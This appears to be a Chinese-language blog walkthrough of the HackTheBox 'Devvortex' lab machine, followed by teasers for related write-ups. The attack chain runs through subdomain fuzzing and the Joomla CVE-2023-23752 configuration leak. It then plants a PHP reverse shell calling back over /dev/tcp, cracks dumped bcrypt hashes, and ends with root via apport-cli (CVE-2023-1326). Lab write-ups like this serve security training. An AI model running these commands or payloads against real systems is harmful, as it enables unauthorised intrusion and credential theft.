HTB-Devvortex-CVE-2023-1326

最新推荐文章于 2024-10-28 16:25:51 发布
最新推荐文章于 2024-10-28 16:25:51 发布
阅读量236 收藏 1
点赞数 1
分类专栏: HTB 文章标签: 安全 web安全 网络安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49288916/article/details/135049429
版权

Devvortex

使用nmap扫描服务器

nmap -sV -sC  10.10.11.242

在这里插入图片描述

使用wfuzz进行子域名爆破

wfuzz -c -w  /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb" -H "Host:FUZZ.devvortex.htb"

在这里插入图片描述

爆破出dev的子域名,将子域名加入hosts

使用gobuster对dev.devvortex.htb进行目录扫描

gobuster dir -u http://dev.devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 200

在这里插入图片描述

扫描出administrator的目录发现登录页面

在这里插入图片描述

扫描出README.txt,发现joomla版本为4.2

在这里插入图片描述

发现是joomla cms在网上发现有专门的漏洞扫描工具:joomscan

下载

apt install joomscan

使用joomscan进行扫描

joomscan -url http://dev.devvortex.htb

在这里插入图片描述

扫描出joomla的版本为4.2.6 并且扫描出部分目录

通过搜索joomla 4.2.6版本爆出有未授权访问-CVE-2023-23752漏洞

影响版本

4.0.0 <= Joomla <= 4.2.7

构造路由 /api/index.php/v1/config/application?public=true

返回数据库信息

在这里插入图片描述

用户名:lewis

密码:P4ntherg0t1n5r3c0n##

使用这个密码在登录页面成功登录后台

在这里插入图片描述

在页面中写入一句话木马反弹nc

system('bash -c "bash -i >& /dev/tcp/10.10.14.75/5566 0>&1"');

在这里插入图片描述

在攻击机监听5566端口

nc -lvc 5566

访问/templates/cassiopeia/offline.php文件nc反弹成功

在这里插入图片描述

使用python 生成伪终端实用程序

python3 -c "import pty;pty.spawn('/bin/bash')"

登录mysql

mysql -u lewis -p joomla --password=P4ntherg0t1n5r3c0n##

查询表单

show tables;

在这里插入图片描述

查询sd4fg_users表

select * form sd4fg_users

在这里插入图片描述

获取到hash值

lewis
$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u 
logan
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

使用john进行破解

john --wordlist=/usr/share/wordlists/rockyou.txt hash

在这里插入图片描述

爆破出密码:tequieromucho

使用密码ssh登录上去

ssh logan@10.10.11.242

查看flag 25900af2d9a5e5e8143ee8422e343c27

在这里插入图片描述

提权

使用sudo -l 查看使用可以用root访问权限运行任何脚本

在这里插入图片描述

发现这个程序可以使用所有权限/usr/bin/apport-cli

搜索apport时发现新爆出漏洞CVE-2023-1326-PoC

POC

sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
输入V
再输入!/bin/bash

在这里插入图片描述

已经提权到root,查看flag

2ce219a001e6f5c9d05d041436e00028

在这里插入图片描述
————本文章仅用于学习记录,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

[渗透测试学习] Devvortex - HackTheBox
rev1ve的博客
12-08 904
我们用kali自带的工具去扫描出Joomla版本信息。然后修改error.php,添加反弹shell命令。发现80端口有http服务,并且是nginx服务。我们访问发现是企业站点,扫描一下是否存在子域名。,我们登录web界面访问robots.txt。由于ssh连接不上,我们采取反弹shell。刚开始ls还没找到,加个参数-al才发现有。然后记住该脚本序号,使用-m参数复制下来。发现有个脚本,我们谷歌尝试搜一下。尝试访问web界面,发现跳转到。但是我们发现目前用户的权限不够。查看一下得到密码,数据库名。
HTB-Chemistry靶机渗透教程,RCE,aiohttp系统目录遍历,导致权限提升
最新发布
xt350488的博客
11-28 653
各种晶体、材料计算处理软件,如Vesta,Diamond,GSAS,Mercury,Rasmal,Materials Studio等都以晶体信息文件作为输入或者输出结果。CVE-2024-23334 aiohttp 3.9.1 的目录遍历漏洞导致系统中的ssh密匙被读取,从而由普通用户的权限,上升到root权限,要么禁用密匙登录,就可以防范。有了第三个用户的密码可以猜测刚刚的22端口,进行ssh连接,登录成功(如果不能连的话直接在反弹的shell直接su切换用户)上传任意文件,这个文件上传的方法不管用。
HackTheBox-Machines--Devvortex
七天
12-15 323
Devvortex 测试过程。
HTBDevvortex[WriteUP]
如有错误感谢斧正
10-28 1193
Apport-cli 是 Ubuntu 系统中用于收集和报告系统错误及崩溃信息的命令行工具,帮助开发者和系统管理员诊断和解决问题。或者直接在cve.mitre.org进行搜索,Ctrl+F进行筛选:apport-cli。需要使用到hashcat对该哈希值进行爆破,首先查询该哈希类型在hashcat中的参数。接下来,在左侧的一堆文件中选中其中一个能写入的PHP文件插入恶意代码。或者还是在MSF中使用扫描模块,先对该CVE编号进行模块搜索。将该文件名与版本扔到谷歌进行Poc、Exp的相关搜索。
HackTheBox系列-Devvortex
qq_43264813的博客
12-15 1210
1、使用nmap进行端口扫描2、将扫描出来的devvortex.htb域名写入到hosts文件中3、使用浏览器访问网站进行信息收集,并且源码中没有发现什么有用的价值4、使用gobuster对子域名爆破发现一个子域名5、添加hosts文件后使用浏览器访问6、对两个网站页面使用dirsearch进行目录枚举,对结果进行分析查看7、访问/administrator目录发现是一个Joomla的登录服务,并且在README.txt文件中知道版本为4.2。
【渗透测试】Devvortex - HackTheBox,简单的企业站点渗透,CMS+密码碰撞
m0_74272345的博客
11-28 1027
一个采用了Joomla建站平台的企业Web站点渗透。主页面没有可利用的点和敏感信息的出现,企业站通常都有子域名wfuzz找到这个子域名,是一个未开发完的网站gobuster扫描出Joomla后台,在中发现一个信息泄露漏洞,拿到数据库的一组用户名密码,密码碰撞进入Joomla后台然后是常规的CMS渗透思路,在用户可访问的PHP文件中添加反弹shell或木马,拿到www-data权限发现该Linux上的logon用户,在数据库中找到了logon的hash,john破解出明文密码然后SSH连接通过。
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
htb-beep
m0_55772907的博客
09-15 1047
一般
【靶机】vulnhub靶机cybox1
weixin_52450702的博客
02-28 602
vulnhub靶机cybox
Wfuzz:功能强大的web漏洞挖掘工具
zhaoweiqi23333的博客
01-15 2697
在靶场复现PRIME:1发表后,小伙伴们发现wfuzz这个工具好强大,都想听小智聊聊它,今天这就来啦,都带好小板凳哦~
打靶总结---部分工具与知识点
qq_61670993的博客
10-22 1824
小菜鸡一枚
对子域名进行爆破尝试
m0_46390077的博客
11-24 442
H 后面跟爆破的格式,fuzz的位置为要爆破的地方 --hw隐藏爆破信息。-i 显示子域名对应的ip。-w 指定一个密码字典。-t 指定最大线程数。
cybox靶机wp
m0_52496313的博客
08-06 492
cybox靶机wp
vulhub打靶记录——driftingbox
qq_55202378的博客
03-30 1046
端口扫描,获取主机开放22、80端口;对80端口,目录扫描;查看网站源代码,发现base64编码的字符串,解码得到一个路径;访问解码得到的路径,获得经过0ok编码的字符串,解码得到:主机ssh部分登录密码;hydra爆破ssh服务,成功登录;pspy64脚本实时监控系统进程,发现按规律执行;emergency中写入反弹shell,系统自动执行,获取root shell。
Wfuzz 使用
StriveBen的博客
03-17 1682
前言 Wfuzz是网站模糊测试爆破工具。 https://github.com/xmendez/wfuzz wfuzz不仅仅是一个web扫描器: wfuzz能够通过发现并利用网站弱点/漏洞的方式帮助你使网站更加安全。wfuzz的漏洞扫描功能由插件支持。 wfuzz是一个完全模块化的框架,这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事,通常...
Wfuzz—功能强大的web漏洞挖掘工具,简单操作轻松实现多种复杂攻击,网络安全必看教程!
A1353192296的博客
10-28 1316
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御基础教程。本文主要讲解Wfuzz爆破。1 简介Wfuzz是一款为了评估WEB应用而生的Fuzz(Fuzz是爆破的一种手段)工具,它基于一个简单的理念,即用给定的Payload去fuzz。它允许在HTTP请求里注入任何输入的值,针对不同的WEB应用组件进行多种复杂的爆破攻击。比如:参数、认证、表单、目录/文件、头部等等,这款工具在kali里面自带。
Web应用安全扫描工具——Wfuzz
看着博客敲代码
07-11 1917
Wfuzz 是一个开源的 Web 应用程序模糊测试工具。它主要用于发现 Web 应用程序中的各种漏洞和隐藏资源。通过向目标发送大量不同的请求,识别出潜在的安全问题,如目录和文件暴露、参数注入、文件上传、认证绕过等。
CVE-2023-4016
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* [HTB...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值